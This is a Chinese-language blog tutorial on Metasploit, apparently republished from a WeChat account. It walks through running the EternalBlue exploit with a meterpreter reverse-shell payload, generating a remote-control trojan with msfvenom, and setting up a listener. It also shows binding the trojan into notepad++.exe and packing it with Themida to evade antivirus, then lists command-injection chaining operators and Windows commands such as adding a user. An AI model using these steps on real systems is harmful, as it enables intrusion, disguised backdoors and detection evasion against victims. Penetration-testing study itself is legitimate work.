渗透测试工具之metasploit及服务器命令执行漏洞

中华人民共和国网络安全法

http://wglj.pds.gov.cn/contents/12512/135136.html


kali渗透测试工具包

https://www.kali.org/tools/

metasploit

msf(metasploit framework)是一款开源安全漏洞和测试工具,集成了各平台上常见的溢出漏洞和流行的shell code,并保持更新。

# 进入msf工具前先将当前系统切换到root模式下
msfconsole init  # 初始化并进入msf工具界面
msfconsole   # 进入msf工具命令行界面

msf工具使用步骤:

使用模块—>配置模块必选项—>运行模块。

查找模块

search ms17_010

# 查找模块
search ms17_010  # 搜索微软2017年第10号漏洞
----------------------------------------------------------------------
msf6 > search ms17_010

Matching Modules
================

  #
  Name                                      Disclosure Date  Rank     Check  Description
  -  ----                                      ---------------  ----     -----  -----------
  0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
  1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
  2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
  3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010
-----------------------------------------------------------------------------------

进入模块

use exploit/windows/smb/ms17_010_eternalblue

# 使用模块,进入模块
use exploit/windows/smb/ms17_010_eternalblue  # 进入永恒之蓝漏洞扫描工具
use 0  # 使用序号进入永恒之蓝漏洞扫描工具
----------------------------------------------------------------------------------
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > 
-----------------------------------------------------------------------------------
模块选项

show options

Required参数为yes则是必选项。

Payload options为攻击载荷,即攻击后想要进行的操作。

meterpreter是metasploit后渗透利器,渗透成功进入meterpreter工具命令行界面,输入help命令即可查看工具帮助信息。

# 显示需要配置的选项
show options
------------------------------------------------------------
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
                                             etasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 200
                                             8 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2
                                             , Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows
                                             7, Windows Embedded Standard 7 target machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.235.131  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > 
------------------------------------------------------------
设置选项

set RHOSTS 192.168.1.130,设置该模块的RHOSTS选项的HOST IP值为192.168.1.139,同样也可以设置为一个范围,如set RHOSTS 192.168.1.0-254,就会对整个范围的地址进行扫描攻击。

执行模块

run


msfvenom

生成远控木马

msfvenom是用来生成后门的工具,在目标机器上执行后门,在本地监听目标上线。

此工具在shell中使用,不是在msfconsole终端中使用。

example:

# -p --> payload
# payload name --> 系统/架构/作用/方式
# payload setting --> lhost lport
# format output ---> -f
# exe ---> exe可执行文件
# -o ---> output, -o demo.exe  生成demo.exe文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.1 lport=9999 -f exe -o demo.ext
------------------------------------------
# 以上步骤为生成一个木马程序,然后需要在当前系统中开启监听

开启监听:

在msfconsole中执行。

use exploit/mutil/handler, show options查看参数选项,并使用set命令配置payload和lhost、lport选项值,并执行run命令运行。

# step1
use exploit/mutil/handler
# step2
set payload windows/x64/meterpreter/reverse_tcp
# step3
set lhost 192.168.1.1
# step4
set lport 9999
# step5
run

用户打开远控木马之后,控制机这边会进入meterpreter终端。

免杀配置
  • 捆绑木马

将远控木马捆绑在正常程序中。

# -x --->附加到某正常程序中
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.1 lport=9999 -f exe -x notepad++.exe -o notepad++.exe
  • 加壳

压缩壳、加密壳。

Themida虚拟机加壳软件(可绕过火绒、腾讯等安全软件)。


命令执行漏洞

# 无论cmd1是否执行成功,cmd2都将被执行
cmd1|cmd2
# 无论cmd1是否执行成功,cmd2都将被执行
cmd1;cmd2
# 无论cmd1是否执行成功,cmd2都将被执行
cmd1&cmd2
# 仅在cmd1执行失败时才执行cmd2
cmd1||cmd2
# 仅在cmd1执行成功时才会执行cmd2
cmd1&&cmd2
---------------------------------------
# 常见Windows命令
whoami   # 查看当前用户名
ipconfig # 查看网卡信息
shutdown -s -t 0 # 立即关机
net user [username] [password] /add # 添加用户名
type [file_name] # 查看filename文件内容


原文始发于微信公众号(不知名菜鸟):渗透测试工具之metasploit及服务器命令执行漏洞

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/170830.html

(0)
小半的头像小半

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!